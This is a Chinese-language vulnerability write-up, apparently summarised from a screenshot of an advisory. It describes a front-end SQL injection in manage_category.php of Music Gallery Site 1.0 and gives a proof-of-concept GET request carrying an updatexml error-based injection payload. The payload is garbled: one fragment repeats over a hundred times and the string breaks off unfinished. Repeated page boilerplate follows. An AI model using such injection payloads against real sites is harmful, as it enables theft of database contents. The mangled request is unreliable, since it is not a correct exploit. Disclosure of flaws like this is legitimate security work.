Music Gallery Site 1.0 前台 SQL 注入漏洞 (含 POC)

从这个网页截图中，可以获取到以下关于漏洞的关键信息： 1. 漏洞名称：Music Gallery Site has a front-end SQL injection vulnerability 2. 受影响版本：Music Gallery Site - 1.0 3. 作者：LiuHaoBin6 4. 软件：https://www.sourcecodester.com/php/16073/music-galler 5. 漏洞文件：/php-music/admin/categories/manage_category.php 6. 描述： - Music Gallery Site 1.0 是通过在 s/manage_category.php 中进行不受限制的 SQL 注入攻击而易受攻击的。 - 攻击者可以利用此漏洞直接获取敏感的服务器信息。 - 恶意攻击者可以利用此漏洞获取服务器数据库中的敏感信息。 7. 状态：CRITICAL 8. POC： - 请求（Request）： ``` GET /php-music/admin/categories/manage_category.php?id=1%27+and+updatexml(1%2Cconcat(0x7e%2C(database%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27)%2C0x7e%2C%27

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

Music Gallery Site 1.0 前台 SQL 注入漏洞 (含 POC)

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

Music Gallery Site 1.0 前台 SQL 注入漏洞 (含 POC)

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！